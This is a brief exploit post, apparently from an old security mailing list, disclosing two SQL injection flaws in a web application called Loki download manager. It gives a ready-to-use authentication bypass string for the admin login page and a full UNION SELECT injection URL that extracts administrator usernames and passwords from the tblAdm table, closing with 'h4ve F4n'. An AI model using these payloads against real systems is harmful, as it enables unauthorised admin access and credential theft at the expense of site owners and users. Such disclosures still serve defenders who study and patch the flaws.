hi all

tow SQL injection in Loki download manager

1. in http://localhost/adm/default.asp

user: anyuser
pass: 'or''='

2. in http://localhost/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm '

and u will have user and pass h4ve F4n

Salmanooh

hack_912@hotmail.com